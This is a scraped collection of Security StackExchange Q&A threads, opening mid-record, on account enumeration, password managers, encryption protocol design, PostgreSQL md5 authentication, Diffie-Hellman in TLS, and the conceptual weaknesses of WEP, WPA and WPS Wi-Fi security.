21165 read(7, "\322\223\211\262Zs\300\345\3264l\254\354[\6wS\326q@", 20) = 20
… Don't worry, /dev/urandom is perfectly fine for cryptography. | {
"source": [
"https://security.stackexchange.com/questions/40633",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/17025/"
]
} |
40,694 | Someone told me it shouldn't be possible for someone to detect if a certain email address is used by a registered user on a website. So, for instance, when the user asks to reset his password, you should say "Password sent" whether the email exists in the database or not. If not, people can use this function to check who is a member and also check validity of spam lists, etc. But I noticed that Facebook says "E-mail already registered" if you try to register the same e-mail twice. Does this mean that conventions have changed; that informing the user is more important than revealing accounts? | It is a rather old tradition not to tell people whether specific logins exist or not. This is why Unix or Windows systems, when asking for user credentials, will respond to any error with a generic "wrong username or password" message. The idea comes from a rather old-fashioned vision of attacks: envision a bad guy who wants to enter a mainframe, and succeeds in getting his hands on a serial terminal plugged to the system, or maybe a telnet interface over a modem line. This attacker will be in a position of an online dictionary attack : he will try to guess a pair login+password which grants access. The administrative login names like "root" were usually better protected than normal user accounts (the "root" user was better at selecting strong passwords, or at least so it was surmised) so attackers would try to find normal user accounts, and, in particular, normal user account names . Watching the movie War Games (from 1983) gives you a good idea of how things were. Note the critical point: in the attack scenario above, the attacker wants to obtain at least an account, but could not get one under normal conditions, or even know who has an account. It is now 2013, three decades after that movie. We have servers where everybody can register for free, and get an account. Obtaining one account is thus no longer an attacker's goal. Instead, the attacker will want to access specific accounts, with known identities. This is not the same situation. The context has changed. Therefore, old lore is not necessarily applicable. Anyway, when a user tries to register on Facebook, he expects the process to work. At that point, the process may fail for only one plausible reason, which is an email address already used. It would be difficult to hide that fact from the user... If we want to "protect" user email addresses, then the registration process must go thus: User enters his alleged email. An email is sent to that address, containing a one-time registration link; however, if the email is already registered, then an email is sent explaining that fact. No clue is written on the response Web page as to whether the email already existed in the system or not. The user registers by following the link from the email. Such a process would double as an email verification process, so that's kind of good. However, it has some latency (user must get out of the Web site, open his email reader, and wait for the incoming email), so this can be problematic for shopping sites (users are not patient, and they are prone to go shop elsewhere if they find the checkout process too cumbersome). Also, there must be some guardrails to avoid this registration system to be abused into a spamming machine. I think it can be said that, for Facebook maintainers, making the registration process as smooth and quick as possible is more important than the user's privacy. Really, who would that surprise ? | {
"source": [
"https://security.stackexchange.com/questions/40694",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/18270/"
]
} |
40,812 | I want to add a password blacklist that would prevent the 1000 most common passwords from being used in order to mitigate shallow dictionary attacks. Is there any negative implication of storing this blacklist in the database? | In that order of magnitude (1000 passwords), I don't see any down sides from a security point of view. If anything, I'd say it's a good idea. Granted, you'll be shrinking the pool of possible passwords which, theoretically, decreases the security. In practice, however, those most commonly used passwords will be one of the first wordlists an attacker would try. In fact, I've seen a few web services disclosing this in their registration forms. Some even block whole dictionaries in addition to common passwords. | {
"source": [
"https://security.stackexchange.com/questions/40812",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/29666/"
]
} |
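A minimal sketch of the check itself, assuming the 1000 entries are exported to a flat file (or loaded from the database) at startup; the file name and normalization below are illustrative.

# Load the common-password list once, refuse matches at registration time.
with open("common_passwords.txt", encoding="utf-8") as fh:
    BLACKLIST = {line.strip().lower() for line in fh if line.strip()}

def is_blacklisted(candidate):
    return candidate.lower() in BLACKLIST     # case-insensitive match; tune as needed

if is_blacklisted("password1"):
    print("Please pick a less common password.")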
40,884 | Justin Schuh defended Google's reasoning in the wake of this post detailing the " discovery " (sic) that passwords saved in the Chrome password manager can be viewed in plaintext. Let me just directly quote him: I'm the Chrome browser security tech lead, so it might help if I
explain our reasoning here. The only strong permission boundary for
your password storage is the OS user account. So, Chrome uses whatever
encrypted storage the system provides to keep your passwords safe for
a locked account. Beyond that, however, we've found that boundaries
within the OS user account just aren't reliable, and are mostly just
theater. Consider the case of someone malicious getting access to your account.
Said bad guy can dump all your session cookies, grab your history,
install malicious extension to intercept all your browsing activity,
or install OS user account level monitoring software. My point is that
once the bad guy got access to your account the game was lost, because
there are just too many vectors for him to get what he wants. We've also been repeatedly asked why we don't just support a master
password or something similar, even if we don't believe it works.
We've debated it over and over again, but the conclusion we always
come to is that we don't want to provide users with a false sense of
security, and encourage risky behavior. We want to be very clear that
when you grant someone access to your OS user account, that they can
get at everything. Because in effect, that's really what they get. I've been using LastPass under the assumption that it is better and safer than using Chrome's built-in password manager. There are two additional facts that are relevant here: LastPass has an option to stay signed in on a trusted computer. Let's assume I use it. Chrome lets you create a separate password for Google's synced data (read: stored passwords). Let's assume I do this as well. With those givens, all other things being equal, is LastPass any safer than Chrome? It seems like once malicious software gets on my system, or a bad guy has access, it doesn't matter from a theoretical perspective, I'm 100% compromised. Is that true? Also, from a practical perspective, is one or the other more likely to be hacked in real life? Are there certain attack vectors which are more common or more successful that would work one one of these or not the other? PS: I don't care about friends, family or novices gaining access to my account. I'm asking about intelligent malicious hackers. | NOTE This answer may be outdated due to improvements in Chrome since this answer was written. First of all, Chrome does encrypt your passwords and other secret data. But there's are different aspects to this depending on the setting, plus a few details that you should keep in mind. On your Computer, In your OS When passwords are saved locally on your computer, Google will attempt to use whatever local password vault might exist. So for example, if you're on OSX, that's the system's Keychain . If you're on Windows, it's the Windows Data Protection API (Microsoft has a peculiar skill for naming products), if you're on KDE, it's the Wallet , in GNOME it's Gnome Keyring . Each of these products has its own implications that are worth noting. For example, if you ever sync your passwords on an OSX device, those passwords go into the Keychain (as mentioned) which has been re-branded the iCloud Keychain -- the implications of which are exactly what they sound like: now Apple knows your saved passwords too, and will sync them to your iPhone, your iPad and any other Apple devices. That may be precisely what you wanted. And maybe not. Just be aware. The Windows Exciting Names And Data Protection API Professional Edition boasts no such features. Your passwords are on your computer, and there they stay until further notice. Call it old-fashioned or call it safe. But bear in mind that Microsoft has a history of chasing Apple, and may decide to do so here as well. In the Cloud In addition to any unintentional iCloud syncing as mentioned above, Chrome will also sync your passwords between Chrome instances. This means sending your data to Google. Yes it's encrypted. How is it encrypted? That's up to you. You can either use your Google Account (the default), or you can set a special "sync passphrase". While I have no special knowledge of the internals of these two options, the implications appear pretty straight-forward. If you use your Google Account password, then the passwords are decrypted with no further intervention on your part. Note that the actual password is in fact required; access to the Google Account alone isn't sufficient. I've seen situations where Chrome had successfully managed to log in and fetch its sync data through external authorization but was not able to decrypt it until I typed in the original Gmail password. 
The advantage, therefore, of using a separate "sync passphrase" is to make sure that anyone who has your Gmail password (presumably Google could, for example) will not have your sync password. Remembering autocomplete=off Passwords The geek.com article mentioned brings up an interesting point, but that point is traditionally argued from a position of... unenlightenment. It's a common position held by "privacy advocates" (particularly the kind for whom I'd put that term in quotes) but the security implications are very, very, very clear, and very definitely, squarely on the side Google takes. I've written about this already. Go read that other answer and then come back. I'll wait. Go on. OK, back? OK, here are the critical points while they're fresh on your mind: autocomplete=off was an intervention added to turn off a very dangerous feature. That feature is not the password saving we've been talking about. The feature we've been talking about helps users. That other one was a misguided attempt at being useful by filling in forms using things you typed on other websites. So imagine an autocomplete assistant like Clippy, but with worse social skills: "I see you're trying to log in to Ebay; I'll just fill in your login from Yahoo and we can see if that works." Yeah, we had funny ideas about security back in the 90's. You can see why putting autocomplete=off into everything even remotely security-related quickly became a bullet-point in site audits. By comparison, the autocomplete that we've been talking about is a very carefully-controlled security-enhancing solution. And if you use it for anything at all , you'll want to use it for your most secure passwords? Why? Phishing. Phishing is literally the single most dangerous online attack facing you. It's super-effective and super-devastating. It doesn't get nearly the attention it should because we always just point a finger at the stupid user who gave the Syrian Electronic Army his password. But defending against phishing is really, really hard, and exploiting it is therefore really, really easy. Furthermore, a successful phishing exploit has unlimited damage potential, all the way up to shutdown-the-whole-bloody-company sort of disasters. And in protecting against phishing, your single greatest weapon is a browser-integrated password manager. It knows where your passwords should be used, and locks you out from using them unless you're actually looking at the right site. It's not fooled by look-alike domains or "site seal" graphics, it knows to check the SSL certificate and knows how to check the SSL certificate. It keeps your passwords locked up until you're ready to use them and staring at the correct login prompt. Should the Chrome password manager ignore the autocomplete=off message? MOST DEFINITELY YES. Should you use it? If you're using LastPass then you're fine sticking with that. But this should be considered a reasonable alternative if the caveats mentioned above don't bother you. If you're not using any password manager, then start using this one right now . It's safe by any reasonable measure, and in particular, far safer than not using it. | {
"source": [
"https://security.stackexchange.com/questions/40884",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/25338/"
]
} |
41,028 | As a learning project, I am trying to implement a secure way to share files with a friend over dropbox. (I am not looking for existing software, I am doing this in order to learn how to do this right.) Of course I will not try to invent my own encryption algorithm. I have a file that I want to send to my friend securely. We both have my Project-to-be on our machines, and a shared dropbox folder. (although means of transfer should be irrelevant). Each of us has a RSA keypair, we have exchanged public keys using a secure method (in person via USB stick, or via GPGed email). I will use RSACryptoServiceProvider with a keysize of 4096 bits for these Keys. (I am considering maybe soon 8192 bits, since I found out that the huge pause of 8-11 seconds in my test application isn't caused by RSA keypair generation, nor encryption, but by key2string or key2base64 operations!) The Keys are stored locally in a text file. The private key is encrypted with AESCryptoServiceProvider in CBC mode, PKCS7 Padding, 256-Bit. The IV will be completely random generated by the CSP. The symmetric key will be derived from a password using Rfc2898DeriveBytes (==PBKDF2), 1000 Iterations, salt from RNGCryptoServiceProvider. (Salt length == final key length) The file is encrypted, again using AESCryptoServiceProvider in CBC mode, PKCS7 Padding, 256-Bit. Key and IV will be completely random for each file, produced by the CSP itself. The IV will be prepended to the encrypted filedata. This package will be hashed using HMACSHA512 with a random key. I don't know whether to use RNGCSP or the HMAC internal randomkeygen , because until now,
I wasn't able to find out how secure that internal method is. (Is this NIST-approved?) The HMAC will be prepended to the IV:cryptedfile package. The HMAC-Key and the AES-Key will be (separately) encrypted with my friend's public key, and in such encrypted form be prepended to the package: cryptedAESKey:cryptedHMACKey:HMAC:IV:cryptedfile this package will be saved as binary to the shared DropBox folder, using the same name and extension the original had. This is because I haven't worked anything out for the filename yet, not even thought about it, suggestions are very welcome. On the receiving end, of course the process works in reverse: enter passphrase to unlock private key decrypt HMAC and AES Key authenticate file decrypt using key and iv save as original filename So, am I doing it right? In other words, do you see any problems, any faux-pas, no-gos, misunderstandings on my side, whatever? I am looking for your experienced verdict on my project, what could be done better, different, not at all, additionally? I think I covered all the things in lessons learned and everything my research has brought to surface. Right now, I am not interested in hiding the existence of communication. Furthermore, the keyhandling inside my application is also not of interest right now, I will get into that as a next step (securing memory against dumping etc.) after I've got the crypto part right. | Making your own crypto is fine as long as you understand that it is for learning , not for using . There are several "layers" in cryptography. There are algorithms , like RSA, AES, SHA-256... Then there are protocols , which assemble algorithms together. And then, there are implementations , which turn protocols into executable code. For a first grasp of cryptography, I usually recommend to go to implementation first: get an existing protocol, and implement it. This has some nice benefits, including the possibility to test your implementation against others, which is great in tracking bugs. This will also give you some insights on how protocols are structured, e.g. to support streamed operation. Since you are concentrating on the sending of a file as a single message, the model appears to be close to what OpenPGP purports to solve; therefore, making a working implementation of OpenPGP in C# is what I recommend. If you still choose to make your own protocol right away , then the following can be said about your choices: Your key sizes are overkill. 256-bit AES keys are quite useless in practice, since 128-bit keys are already quite far beyond that which is breakable with existing technology (e.g. see this answer ). Similarly, 4096-bit RSA keys are oversized; 2048 bits are already more than enough to ensure security. Since larger keys imply reduced performance, oversized keys imply unrealistic slowness which will not be representative of what can be achieved, thus lowering the pedagogical value of the whole endeavour. Conversely, 1000 rounds of PBKDF2 could be considered as too small. For a password-to-key conversion, the iterations are there for a "muscle show", to cope with the inherent weakness of the password (that is, the inherent weakness of the meat bag who will have to remember it), so you want that iteration count to be as high as is tolerable, thus relating to the power of your computer and your patience. A typical count value, with today's computer, would be around 100000 or even some millions. You use a MAC for the encryption of the file, but not for the encryption of your private key. 
This looks strange. There are situations where a MAC is not necessary, but most contexts where encryption is warranted also call for a MAC. It would be simpler to use the same format for both encryptions. You apply the MAC on the encrypted file: that's encrypt-then-MAC , and that's good -- and you did think of making the encryption IV part of the MAC input, which is even better (that's a classic mistake which you neatly avoided). You might want, though, to make some allowance for some future algorithm agility : maybe, at some point, you will want to use another symmetric encryption algorithm. In that case, some symbolic identifier for the encryption algorithm should also be part of the MAC input; this can be as simple as a first byte of value 0x00, leaving you some root for 255 other future algorithms. You use HMAC with SHA-512, which is not bad, but SHA-256 is not bad either and will offer substantially better performance on 32-bit systems. There again, race to the largest outputs and key sizes is artificial and sterile. SHA-256 is more than "secure enough". CBC mode and a separate MAC are "old style". There are modern encryption modes which combine the encryption and the MAC within a single primitive, reducing the possible scope of implementation errors; in particular, EAX and GCM . I understand that .NET does not offer them (yet); CipherMode is limited to CBC, CFB, CTS, ECB and OFB. In that case, CBC is not the worst choice, with an extra MAC (i.e. HMAC, as you suggest). To use CBC properly, an unpredictable random IV is necessary, and that's what you suggest (good). Be extra wary when implementing the decryption. You should first verify the MAC, and then, only if the MAC verification succeeded, may you proceed with the decryption. The tricky point is in the padding handling: an attacker could try to extract secrets from the recipient, by sending altered files and see how the recipient reacts, e.g. when the recipient found a syntactically valid padding or not. This is the basis of padding oracle attacks . You can process the incoming data in blocks, computing both the MAC and the putative decryption in parallel, but take care, for the last block, to compute and check the MAC first (this is the kind of hurdle that is avoided with GCM or EAX). Encrypting the key for AES and the key for HMAC is weird; it would allow a creative attacker to swap them around, making the recipient use the HMAC key for decryption, and vice versa. Although the benefits would not be obvious, it is very hard to tell whether a vulnerability exists that way; it depends on how "different" AES is from HMAC, a property which is not well-defined and, in any case, has not been thoroughly investigated. It seems safer, and also more performant, to use a single "master key" K , encrypted with the recipient's public key, and to derive the AES key and the HMAC key from it with some Key Derivation Function . It can be as simple as making K a 256-bit key (generated randomly) and splitting it in two halves, one for AES and the other for HMAC. Or you could make K longer (or even shorter), hash it with SHA-256, use split the SHA-256 output into two halves. The point is that a single RSA encryption is needed, not two. Also, deriving the encryption and MAC keys from a single source will map better to a possible future use of GCM or EAX. Your file format does not allow for streamed processing. In your format, the MAC is computed over the complete encrypted file, but its value comes first, before the encryption result. 
This means that the sender will have to process the whole file before beginning the sending. Thus, for a 1 GB file, 1 GB of temporary disk space (or RAM) will be necessary. This could be avoided if the MAC value was appended at the end, rather than stored in a prefix. Note that this buffering issue necessarily exists for the recipient, who must verify the MAC before using the decrypted data in any way. To fully cope with that, you would have to make a more complex format, with moderate-sized chunks, each with its own encryption and MAC, and some glue for secure assembly. The model would be SSL/TLS here. There is no authentication ! The recipient has no way of knowing whether the file he received indeed came from the alleged sender. To add authentication, in your setup, you will need digital signatures . Note that a digital signature may replace a MAC, if applied adequately , which is not an easily guaranteed property. It is safer to simply compute a signature (with the sender's private key) over the complete structure. There is no protection against replay attacks . An attacker, observing a file in transit, could send the same file again at a later date. It is then up to the recipient to take measures to detect such duplicates. This can be as simple as a date somewhere within the data file, under the protection of the MAC (and possibly the encryption, although this is not necessary), but it must be given some thought. By encrypting the private key yourself, I understand that you do not let the operating system take care of it. This could be limitative. Indeed, a RSACryptoServiceProvider instance could, potentially, use a key which physically resides in a smart card ; and even for software keys, there can be some security benefits with letting the OS take care of the storage (the OS has privileged access to the hardware, and can, for instance, avoid leaking secret keys to the disk through virtual memory ). By using an explicit key file , you make your system incompatible with such potentialities, which is a shame. There is no room for metadata, in particular a content type . The same sequence of bytes can have several interpretations, and there can be amusing consequences if the recipient can be induced into opening a HTML file as PDF or vice versa. Ideally, that which you actually encrypt should be a structure with a header containing a designation of the type of data (e.g. a media type ) followed by the data itself. All of this is said in no particular order and without claiming exhaustivity. The synthetic conclusion is that protocol design is not simple; it helps to have some solid implementation experience on which to base the design. | {
"source": [
"https://security.stackexchange.com/questions/41028",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/29828/"
]
} |
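Two of the answer's points, deriving both working keys from a single master key and checking the MAC over IV plus ciphertext before any decryption, can be sketched briefly. This is a Python standard-library illustration, not the asker's C# design, and the AES step itself is stubbed out.

import hashlib
import hmac
import os

master_key = os.urandom(32)                   # the one key that gets RSA-encrypted

# Simple KDF: hash the master key and split the digest into two independent halves.
digest = hashlib.sha256(master_key).digest()
enc_key, mac_key = digest[:16], digest[16:]

iv = os.urandom(16)
ciphertext = b"\x00" * 32                     # stand-in for the AES-CBC output under enc_key

# Encrypt-then-MAC: the tag covers IV and ciphertext, and the recipient verifies it
# before attempting any decryption (avoids padding-oracle style leaks).
tag = hmac.new(mac_key, iv + ciphertext, hashlib.sha256).digest()
package = tag + iv + ciphertext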
41,064 | According to Postgres's documentation , Postgres's password authentication method uses MD5 hashing to secure the password: The password-based authentication methods are md5 and password. These
methods operate similarly except for the way that the password is sent
across the connection, namely MD5-hashed and clear-text respectively. If you are at all concerned about password "sniffing" attacks then md5
is preferred. Plain password should always be avoided if possible.
However, md5 cannot be used with the db_user_namespace feature. If the
connection is protected by SSL encryption then password can be used
safely (though SSL certificate authentication might be a better choice
if one is depending on using SSL). I've heard from numerous sources that the MD5 hashing algorithm is no longer considered secure. Does this mean that I should avoid using password-based authentication for Postgres? If so, which alternative method should I use? | If using SSL, then what PostgreSQL does is fine. If not using SSL, but still doing the authentication across the network, then what PostgreSQL does stinks. Their games with MD5 are worthless, but not because they use MD5. MD5 has its own issues, but there they are just misusing it awfully. With "cleartext password" authentication, the client shows a user name and a password, and the server accepts them if they match what the server stored. With "md5" authentication, the client shows a value (which happens to be the MD5 hash of the concatenation of the password and the user name) and the server accepts it if it matches what the server stored. So you see it: in both cases , the client shows a bunch of bytes to the server, always the same sequence. It suffices for an attacker to tap on the network to observe these bytes, and then connect to the server and sends the same bytes to be granted entry. That the bytes are the result of a MD5 hash is completely irrelevant here. This MD5 hash is said to be password equivalent . As long as the connection can be eavesdropped at all (i.e. no SSL), then security goes down the drain. See this page for the details of the MD5 computation. They call it "encryption", which it is not at all (hashing is not encryption). We could even argue that using this MD5 decreases security: when a plaintext password is used, it can be forwarded to another authentication server (using Kerberos, LDAP,...) and that authentication server could then employ strong storage techniques (see password hashing ). With the PostgreSQL-specific MD5 hash, this cannot apply. When the "md5" authentication method is used, it MUST be against a table in the database which contains all these "md5" value as is. An attacker who can get his hands on, say, a backup tape or an old disk, will immediately obtain many free accounts on the database. And, I insist, nothing in all this has anything to do with MD5 cryptographic weaknesses. All of this would still apply if MD5 was replaced with SHA-512. | {
"source": [
"https://security.stackexchange.com/questions/41064",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/29865/"
]
} |
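To make the "password equivalent" point concrete: for md5 authentication PostgreSQL stores the MD5 of the password concatenated with the user name, prefixed with the string md5. A Python illustration with made-up credentials:

import hashlib

username = "alice"
password = "hunter2"

stored = "md5" + hashlib.md5((password + username).encode()).hexdigest()
print(stored)   # whoever learns this value can authenticate as alice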
41,205 | I'm struggling to understand the (non-)use of Diffie-Hellman (DH) in TLS. DH has been around for a long time now, why does almost nobody use it, yet? DH is only being used for "key sharing", why does nobody use the DH secret to encrypt everything? Why do we need a symmetric key, when we already have a DH secret, that is good enough to transport yet another secret? That also applies to SSH (not?). I think there's a simple answer to that, but I couldn't find it. | Diffie-Hellman is used in SSL/TLS, as "ephemeral Diffie-Hellman" (the cipher suites with "DHE" in their name; see the standard ). What is very rarely encountered is "static Diffie-Hellman" (cipher suites with "DH" in their name, but neither "DHE" or "DH_anon"): these cipher suites require that the server owns a certificate with a DH public key in it, which is rarely supported for a variety of historical and economical reasons, among which the main one is the availability of a free standard for RSA ( PKCS#1 ) while the corresponding standard for Diffie-Hellman ( x9.42 ) costs a hundred bucks, which is not much, but sufficient to deter most amateur developers. Diffie-Hellman is a key agreement protocol , meaning that if two parties (say, the SSL client and the SSL server) run this protocol, they end up with a shared secret K . However, neither client or server gets to choose the value of K ; from their points of view, K looks randomly generated. It is secret (only them know K ; eavesdroppers on the line do not) and shared (they both get the same value K ), but not chosen . This is not encryption. A shared secret K is good enough, though, to process terabytes of data with a symmetric encryption algorithm (same K to encrypt on one side and decrypt on the other), and that is what happens in SSL. There is a well-known asymmetric encryption algorithm called RSA, though. With RSA, the sender can encrypt a message M with the recipient's public key, and the recipient can decrypt it and recover M using his private key. This time, the sender can choose the contents of M . So your question might be: in an RSA world, why do we bother with AES at all? The answer lies in the following points: There are constraints on M . If the recipient's public key has size n (in bytes, e.g. n = 256 for a 2048-bit RSA key), then the maximum size of M is n-11 bytes. In order to encrypt a longer message, we would have to split it into sufficiently small blocks, and include some reassembly mechanism. Nobody really knows how to do that securely . We have good reasons to believe that RSA on a single message is safe, but subtle weaknesses can lurk in any split-and-reassemble system and we are not comfortable with that. It is already bad enough with symmetric ciphers , where the mathematical situation is simpler, Even if we could handle the splitting-and-reassembly, there would be a size expansion. With a 2048-bit RSA key, an internal message chunk has the size of at most 245 bytes, but when encrypted, it yields to be a 256-byte sequence. This wastes our life energy, i.e. the network bandwidth. Symmetric encryption incurs only a bounded overhead (well, SSL adds a slight overhead proportional to the data size, but it is much smaller than what would occur with a RSA-only protocol), Compared to AES, RSA is slow as hell, We really like to have the option of using key agreement protocols like DH instead of RSA. In older times (before 2001), RSA was patented but DH was not, so the US government was recommending DH. 
Nowadays, we want to be able to switch algorithms in case one becomes broken. In order to support key agreement protocols, we need some symmetric encryption, so we may just as well use it with RSA. It simplifies implementation and protocol analysis. See this answer for a detailed description of how SSL works. | {
"source": [
"https://security.stackexchange.com/questions/41205",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/29984/"
]
} |
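A toy run of the key agreement described above: both parties end up with the same K, but neither of them chose its value. Tiny parameters for readability; real DH uses groups of 2048 bits or more.

import secrets

p, g = 2147483647, 5                 # toy prime and generator, illustration only

a = secrets.randbelow(p - 2) + 1     # client secret
b = secrets.randbelow(p - 2) + 1     # server secret

A = pow(g, a, p)                     # sent client -> server
B = pow(g, b, p)                     # sent server -> client

assert pow(B, a, p) == pow(A, b, p)  # the shared secret K, random-looking to both sides
# K is then run through a KDF and used as the symmetric (e.g. AES) key.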
41,230 | Let's say I have a wireless network that is password protected. What procedures can an intruder take to gain access to my wireless network, or at least be able to decipher the packets I am sending into something understandable? How long would such a method take? For example, how exactly does aircrack gain access? This related question is about what happens once an attacker knows the password: I'm interested in how they get the password. | First of all that would entirely depend on the encryption used by the access point. There are several types of possible encryption. Mostly on consumer wireless access points these are: WEP WPA WPA2 WPS WEP Let's first dive into WEP. WEP was the first algorithm used to secure wireless access points. Unfortunately it was discovered that WEP had some serious flaws. In 2001, 3 researchers working at Berkeley produced a paper named " (In)Security of the WEP algorithm ". They found the following flaws in WEP: Passive attacks to decrypt traffic based on statistical analysis. Active attack to inject new traffic from unauthorized mobile stations, based on known plaintext. Active attacks to decrypt traffic, based on tricking the access
point. Dictionary-building attack that, after analysis of about a day's worth
of traffic, allows real-time automated decryption of all traffic. An excerpt from their paper about the technical problems with WEP: WEP uses the RC4 encryption algorithm, which is known as a stream
cipher. A stream cipher operates by expanding a short key into an
infinite pseudo-random key stream. The sender XORs the key stream with
the plaintext to produce ciphertext. The receiver has a copy of the
same key, and uses it to generate identical key stream. XORing the key
stream with the ciphertext yields the original plaintext. This mode of operation makes stream ciphers vulnerable to several
attacks. If an attacker flips a bit in the ciphertext, then upon
decryption, the corresponding bit in the plaintext will be flipped.
Also, if an eavesdropper intercepts two ciphertexts encrypted with the
same key stream, it is possible to obtain the XOR of the two
plaintexts. Knowledge of this XOR can enable statistical attacks to
recover the plaintexts. The statistical attacks become increasingly
practical as more ciphertexts that use the same key stream are known.
Once one of the plaintexts becomes known, it is trivial to recover all
of the others. WEP has defenses against both of these attacks. To ensure that a
packet has not been modified in transit, it uses an Integrity Check
(IC) field in the packet. To avoid encrypting two ciphertexts with the
same key stream, an Initialization Vector (IV) is used to augment the
shared secret key and produce a different RC4 key for each packet. The
IV is also included in the packet. However, both of these measures are
implemented incorrectly, resulting in poor security. The integrity check field is implemented as a CRC-32 checksum, which
is part of the encrypted payload of the packet. However, CRC-32 is
linear, which means that it is possible to compute the bit difference
of two CRCs based on the bit difference of the messages over which
they are taken. In other words, flipping bit n in the message results
in a deterministic set of bits in the CRC that must be flipped to
produce a correct checksum on the modified message. Because flipping
bits carries through after an RC4 decryption, this allows the attacker
to flip arbitrary bits in an encrypted message and correctly adjust
the checksum so that the resulting message appears valid. The initialization vector in WEP is a 24-bit field, which is sent in
the cleartext part of a message. Such a small space of initialization
vectors guarantees the reuse of the same key stream. A busy access
point, which constantly sends 1500 byte packets at 11Mbps, will
exhaust the space of IVs after 1500*8/(11*10^6)*2^24 = ~18000 seconds,
or 5 hours. (The amount of time may be even smaller, since many
packets are smaller than 1500 bytes.) This allows an attacker to
collect two ciphertexts that are encrypted with the same key stream
and perform statistical attacks to recover the plaintext. Worse, when
the same key is used by all mobile stations, there are even more
chances of IV collision. For example, a common wireless card from
Lucent resets the IV to 0 each time a card is initialized, and
increments the IV by 1 with each packet. This means that two cards
inserted at roughly the same time will provide an abundance of IV
collisions for an attacker. (Worse still, the 802.11 standard
specifies that changing the IV with each packet is optional!) Some other interesting reading material can be found at aircrack-ng.org . WPA The second one is WPA. WPA was originally meant as a wrapper to WEP which tackles the insecurities caused by WEP. It was actually never meant as a security standard but just as a quick fix until WPA2 became available. There are two modes in which it can operate: WPA-PSK: Preshared key (password) WPA-Enterprise: This requires a RADIUS server and can be combined with an Extensible Authentication Protocol (EAP). WPA generally uses Temporal Key Integrity Protocol (TKIP). TKIP was designed by the IEEE 802.11i task group and the Wi-Fi Alliance as a solution to replace WEP without requiring the replacement of legacy hardware. This was necessary because the breaking of WEP had left WiFi networks without viable link-layer security, and a solution was required for already deployed hardware. TKIP is not an encryption algorithm, but it's used to make sure that every data packet is sent with a unique encryption key. From the aircrack-ng.org paper TKIP implements a more sophisticated key mixing function for mixing a
session key with an initialization vector for each packet. This
prevents all currently known related key attacks because every byte of
the per packet key depends on every byte of the session key and the
initialization vector. Additionally, a 64 bit Message Integrity Check
(MIC) named MICHAEL is included in every packet to prevent attacks on
the weak CRC32 integrity protection mechanism known from WEP. To
prevent simple replay attacks, a sequence counter (TSC) is used which
allows packets only to arrive in order at the receiver. There are two attacks known against TKIP: Beck-Tews attack Ohigashi-Morii attack (which is an improvement on the Beck-Tews attack) However both of these attacks only could decrypt small portions of data, compromising confidentiality. What they can't give you is access to the network. To give you an idea of how much data can be recovered, a single ARP frame would take around 14-17 minutes to get the plain text. The only attack know, besides flaws in firmware of some routers, is bruteforcing the WPA key. Generally the key is generated as follows: Key = PBKDF2(HMAC−SHA1,passphrase, ssid, 4096, 256) Considering this algorithm is meant to prevent hashed passwords from being broken it can take a huge amount of time. The only reasonable attack would be to use a dictionary attack (hence it is important to use long passwords containing characters, numbers and letters). Also note that you need to change your SSID to something very random. Rainbow tables have been generated for the top 1000 used SSIDs . WPA also supports AES (which can be used instead of RC4). This would still imply that TKIP-MIC is used. WPA2 WPA2 supports the same modes as WPA, except that it does not use TKIP but CCMP for cryptograhic encapsulation. CCMP is an enhanced data cryptographic encapsulation mechanism designed for data confidentiality and based upon the Counter Mode with CBC-MAC (CCM) of the AES standard. This is used to replace TKIP for message confidentiality. However some access points can still be configured to use both TKIP and CCMP. This was done because otherwise people were required to upgrade their hardware. Extensions WPS Wi-Fi Protected Setup (WPS; originally Wi-Fi Simple Config) is a computing standard that attempts to allow easy establishment of a secure wireless home network. It allowed easy security for home users but still using the more secure WPA rather than WEP. WPS should never be used as there is a great design flaw in it. WPS generates 'by the push of a buton' a PIN code which can be entered by the user. The idea behind this was to increase usability. This poses a problem: the amount of possibilities is reduced to 10.000.000 which any computer can crunch through quite rapidly, even when using PBKDF2. EAP EAP is used for WPA(2)-Enterprise and is an authentication framework, not a specific authentication mechanism. It provides some common functions and negotiation of authentication methods called EAP methods. There are currently about 40 different methods defined. Some have their own flaws however considering the vast amount of possibilities I suggest looking them up yourself. | {
"source": [
"https://security.stackexchange.com/questions/41230",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/27627/"
]
} |
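The key-derivation formula quoted in the WPA section above maps directly onto PBKDF2 with HMAC-SHA1, the SSID as salt, 4096 iterations and a 256-bit output. A short Python illustration with invented values:

import hashlib

passphrase = "correct horse battery staple"
ssid = "HomeNetwork42"   # also why rainbow tables target the most common SSIDs

pmk = hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)
print(pmk.hex())         # 256-bit pairwise master key derived from the passphrase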